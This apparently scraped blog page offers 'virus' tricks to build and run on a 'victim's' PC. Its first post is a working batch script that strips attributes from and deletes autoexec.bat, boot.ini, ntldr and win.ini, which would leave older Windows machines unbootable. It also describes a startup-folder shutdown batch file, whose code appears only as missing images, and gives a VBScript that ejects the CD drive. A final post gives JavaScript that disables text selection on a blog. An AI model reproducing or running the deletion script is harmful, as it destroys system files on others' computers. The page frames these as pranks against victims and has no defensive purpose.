DANGEROUS VIRUS CODE

In the post Show below virus coding is very dangerous, first open the notepad type code

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save as in to virus.bat file system
Category: 0 comments

SHUTDOWN VIRUS

This is the virus which let you to shutdown everytime you'll open your pc if you put the file in "startup" folder.















First open notepad and type like show below image















And save in to filename.bat ,open the bat file its display a System shutdown dialogue box within
160 seconds computer will turn off shown below the figure


















ENjoy:)
Category: 0 comments

Optical Drive Door Virus

Guys try this is..... It is a virus code hope you will enjoy by building it and screwing it on VICTIM'S Pc... :P



Open the notepad type the following coding

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set oCD = oWMP.cdromCollection.getByDriveSpecifier("J:") ' or whatever
If vbOK = MsgBox ("Eject?", vbOKCancel) Then
oCD.Eject
If vbOK = MsgBox ("Close?", vbOKCancel) Then
oCD.Eject
End if
End if

And save it in to filename.vbs

NOTE: that's it... try if you want at your own risk.... :)
Category: 0 comments

How To Disable Right Click On Your Website Or Blog

If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?

1. Got to your blogger Dashboard and then Click on Layout.












  2. Now Click on Add Gadget and select Html/Javascript. 












 3. Now paste code given below in the pop up window. 
  <!--MBW Code-->
  <script language='JavaScript1.2'>
  function disableselect(e){
  return false
  }
  function reEnable(){
  return true
  }
  document.onselectstart=new Function ("return false")
  if (window.sidebar){
  document.onmousedown=disableselect
  document.onclick=reEnable
  }
  </script>
  <!--Code End http://mybloggersworld.blogspot.in>

4. Save it and done.